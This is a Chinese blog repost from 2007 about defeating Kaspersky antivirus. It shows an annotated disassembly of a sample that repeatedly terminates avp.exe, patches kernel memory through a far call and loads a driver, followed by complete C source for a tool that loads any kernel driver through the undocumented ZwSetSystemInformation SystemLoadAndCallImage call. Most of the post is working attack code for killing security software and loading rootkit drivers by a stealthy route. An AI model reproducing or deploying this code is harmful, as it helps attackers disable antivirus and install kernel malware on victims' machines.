ZWSETSYSTEMINFORMATION过卡巴

最新推荐文章于 2020-07-04 12:28:53 发布

iiprogram

最新推荐文章于 2020-07-04 12:28:53 发布

阅读量1.3k

点赞数

分类专栏： windows底层核心編程文章标签： callback string image system access c

本文链接：https://blog.csdn.net/iiprogram/article/details/1763972

版权

windows底层核心編程专栏收录该内容

743 篇文章 18 订阅

订阅专栏

一段算是针对卡巴的程序

2007-07-08 22:06

OD代码：
0040130B    |.    68 54304000     push      00403054                           ; /Arg1 = 00403054 ASCII "avp.exe"
00401310    |.    E8 4FFEFFFF     call      00401164                           ; /结束卡巴.00401164
00401315    |.    A3 38304000     mov       dword ptr [403038], eax
0040131A    |.    FF35 38304000 push      dword ptr [403038]                 ; /ProcessId = 0
00401320    |.    6A 00           push      0                                  ; |Inheritable = FALSE
00401322    |.    6A 01           push      1                                  ; |Access = TERMINATE
00401324    |.    E8 2B010000     call      <jmp.&kernel32.OpenProcess>        ; /OpenProcess
00401329    |.    8BD8            mov       ebx, eax
0040132B    |.    6A FF           push      -1                                 ; /ExitCode = FFFFFFFF (-1.)
0040132D    |.    53              push      ebx                                ; |hProcess
0040132E    |.    E8 3F010000     call      <jmp.&kernel32.TerminateProcess> ; /TerminateProcess
00401333    |.    53              push      ebx                                ; /hObject
00401334    |.    E8 FD000000     call      <jmp.&kernel32.CloseHandle>        ; /CloseHandle
00401339    |.    68 C8000000     push      0C8                                ; /Timeout = 200. ms
0040133E    |.    E8 29010000     call      <jmp.&kernel32.Sleep>              ; /Sleep
00401343    |.    68 5C304000     push      0040305C                           ; /Arg1 = 0040305C ASCII "avp.exe"
00401348    |.    E8 17FEFFFF     call      00401164                           ; /结束卡巴.00401164
0040134D    |.    A3 38304000     mov       dword ptr [403038], eax
00401352    |.    FF35 38304000 push      dword ptr [403038]                 ; /ProcessId = 0
00401358    |.    6A 00           push      0                                  ; |Inheritable = FALSE
0040135A    |.    6A 01           push      1                                  ; |Access = TERMINATE
0040135C    |.    E8 F3000000     call      <jmp.&kernel32.OpenProcess>        ; /OpenProcess
00401361    |.    8BD8            mov       ebx, eax
00401363    |.    6A FF           push      -1                                 ; /ExitCode = FFFFFFFF (-1.)
00401365    |.    53              push      ebx                                ; |hProcess
00401366    |.    E8 07010000     call      <jmp.&kernel32.TerminateProcess> ; /TerminateProcess
0040136B    |.    53              push      ebx                                ; /hObject
0040136C    |.    E8 C5000000     call      <jmp.&kernel32.CloseHandle>        ; /CloseHandle
00401371    |.    68 C8000000     push      0C8                                ; /Timeout = 200. ms
00401376    |.    E8 F1000000     call      <jmp.&kernel32.Sleep>              ; /Sleep
0040137B    |.    68 64304000     push      00403064                           ; /Arg1 = 00403064 ASCII "avp.exe"
00401380    |.    E8 DFFDFFFF     call      00401164                           ; /结束卡巴.00401164
00401385    |.    A3 38304000     mov       dword ptr [403038], eax
0040138A    |.    FF35 38304000 push      dword ptr [403038]                 ; /ProcessId = 0
00401390    |.    6A 00           push      0                                  ; |Inheritable = FALSE
00401392    |.    6A 01           push      1                                  ; |Access = TERMINATE
00401394    |.    E8 BB000000     call      <jmp.&kernel32.OpenProcess>        ; /OpenProcess
00401399    |.    8BD8            mov       ebx, eax
0040139B    |.    6A FF           push      -1                                 ; /ExitCode = FFFFFFFF (-1.)
0040139D    |.    53              push      ebx                                ; |hProcess
0040139E    |.    E8 CF000000     call      <jmp.&kernel32.TerminateProcess> ; /TerminateProcess
004013A3    |.    53              push      ebx                                ; /hObject
004013A4    |.    E8 8D000000     call      <jmp.&kernel32.CloseHandle>        ; /CloseHandle
004013A9    |.    68 C8000000     push      0C8                                ; /Timeout = 200. ms
004013AE    |.    E8 B9000000     call      <jmp.&kernel32.Sleep>              ; /Sleep
004013B3    |.    5F              pop       edi
004013B4    |.    5E              pop       esi
004013B5    |.    5B              pop       ebx
004013B6    /.    C3              retn
004013B7 >/$    6A 01           push      1                                  ; /ShowState = SW_SHOWNORMAL
004013B9    |.    68 6C304000     push      0040306C                           ; |CmdLine = "Call.dat"
004013BE    |.    E8 C1000000     call      <jmp.&kernel32.WinExec>            ; /WinExec
004013C3    |.    E8 75FEFFFF     call      0040123D
004013C8    |.    0BC0            or        eax, eax
004013CA    |.    74 62           je        short 0040142E
004013CC    |.    A3 09304000     mov       dword ptr [403009], eax
004013D1    |.    FF1D 3C304000 call      far fword ptr [40303C]
004013D7    |.    8BC4            mov       eax, esp
004013D9    |.    8B6424 04       mov       esp, dword ptr [esp+4]
004013DD    |.    50              push      eax
004013DE    |.    A1 09304000     mov       eax, dword ptr [403009]
004013E3    |.    C680 B1B70100>mov       byte ptr [eax+1B7B1], 0EB
004013EA    |.    C680 86CA0100>mov       byte ptr [eax+1CA86], 0EB
004013F1    |.    5C              pop       esp
004013F2    |.    68 F8134000     push      004013F8
004013F7    |.    CB              retf                                       ;    RET 用作跳转到 004013F8
004013F8    |>    6A 00           push      0                                  ; /pModule = NULL
004013FA    |.    E8 4F000000     call      <jmp.&kernel32.GetModuleHandleA> ; /GetModuleHandleA
004013FF    |.    A3 78304000     mov       dword ptr [403078], eax
00401404    |.    68 D0070000     push      7D0                                ; /Timeout = 2000. ms
00401409    |.    E8 5E000000     call      <jmp.&kernel32.Sleep>              ; /Sleep
0040140E    |.    E8 F5FEFFFF     call      00401308
00401413    |.    E8 F0FEFFFF     call      00401308
00401418    |.    E8 EBFEFFFF     call      00401308
0040141D    |.    6A 0A           push      0A                                 ; /Arg4 = 0000000A
0040141F    |.    6A 00           push      0                                  ; |Arg3 = 00000000
00401421    |.    6A 00           push      0                                  ; |Arg2 = 00000000
00401423    |.    FF35 78304000 push      dword ptr [403078]                 ; |Arg1 = 00000000
00401429    |.    E8 D2FBFFFF     call      00401000                           ; /结束卡巴.00401000
0040142E    |>    6A 00           push      0                                  ; /ExitCode = 0
00401430    /.    E8 0D000000     call      <jmp.&kernel32.ExitProcess>        ; /ExitProcess

而Call.dat通过ZwSetSystemInformation（这种方法用的不太多吧）加载驱动C:/MIGBOT.SYS
在邪八找到了一段代码，又学到东西了：

#include <windows.h>
#include <stdio.h>
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define SystemLoadAndCallImage 38

typedef struct _UNICODE_STRING {
      USHORT Length;
      USHORT MaximumLength;
      PVOID Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

typedef unsigned long NTSTATUS;

typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE
{
      UNICODE_STRING ModuleName;
} SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE;

typedef DWORD (CALLBACK* ZWSETSYSTEMINFORMATION)(DWORD, PVOID, ULONG);
ZWSETSYSTEMINFORMATION ZwSetSystemInformation;
typedef DWORD (CALLBACK* RTLINITUNICODESTRING)(PUNICODE_STRING,PCWSTR );
RTLINITUNICODESTRING RtlInitUnicodeString;
typedef DWORD (CALLBACK* RTLANSISTRINGTOUNICODESTRING)(PVOID, PVOID,DWORD);
RTLANSISTRINGTOUNICODESTRING RtlAnsiStringToUnicodeString;

int main(int argc, char *argv[])
{
      SYSTEM_LOAD_AND_CALL_IMAGE GregsImage;
      UNICODE_STRING TmpBuff;
      char      szDrvFullPath[256],szTmp[256];
      int iBuffLen;

      printf("Load driver with ZwSetSystemInformation( )/r/n");
      printf("Date: 8th May 2007/r/n");
      printf("Modifed by: GaRY <wofeiwo_at_gmail_dot_com>/r/n/r/n");
      if(argc != 2 || stricmp(argv[1], "-h") ==0 || stricmp(argv[1], "-?") ==0 || stricmp(argv[1], "/?") ==0)
      {
          printf("Usage: %s <DriverPath>/r/n", argv[0]);
          exit(-1);
      }

      // 从ntll.dll获取函数
      if( !(RtlInitUnicodeString = (RTLINITUNICODESTRING) GetProcAddress( GetModuleHandle("ntdll.dll"),    "RtlInitUnicodeString" )) )
      {
          printf( "GetProcAddress(/"RtlInitUnicodeString/") Error:%d/n", GetLastError() );
          exit(1);
      }
      if( !(ZwSetSystemInformation = (ZWSETSYSTEMINFORMATION) GetProcAddress( GetModuleHandle("ntdll.dll"), "ZwSetSystemInformation" )) )
      {
          printf( "GetProcAddress(/"ZwSetSystemInformation/") Error:%d/n", GetLastError() );
          exit(1);
      }
      if( !(RtlAnsiStringToUnicodeString = (RTLANSISTRINGTOUNICODESTRING) GetProcAddress( GetModuleHandle("ntdll.dll"), "RtlAnsiStringToUnicodeString" )) )
      {
          printf( "GetProcAddress(/"ZwSetSystemInformation/") Error:%d/n", GetLastError() );
          exit(1);
      }

      GetFullPathName(argv[1], 256, szTmp, NULL);
      printf("Loading driver: %s/r/n", szTmp);
      iBuffLen = sprintf(szDrvFullPath, "//??//%s", szTmp);
      szDrvFullPath[iBuffLen]=0;
      TmpBuff.Buffer = (PVOID)szDrvFullPath;
      TmpBuff.Length = iBuffLen;
      RtlAnsiStringToUnicodeString(&(GregsImage.ModuleName),&TmpBuff,1);

      if( NT_SUCCESS( ZwSetSystemInformation( SystemLoadAndCallImage, &GregsImage, sizeof(SYSTEM_LOAD_AND_CALL_IMAGE)) ))      //加载进内核空间
      {
          printf("Driver: %s loaded./r/n", szDrvFullPath);
      }
      else
      {
          printf("Driver: %s not loaded./r/n", szDrvFullPath);
      }
      return true;
}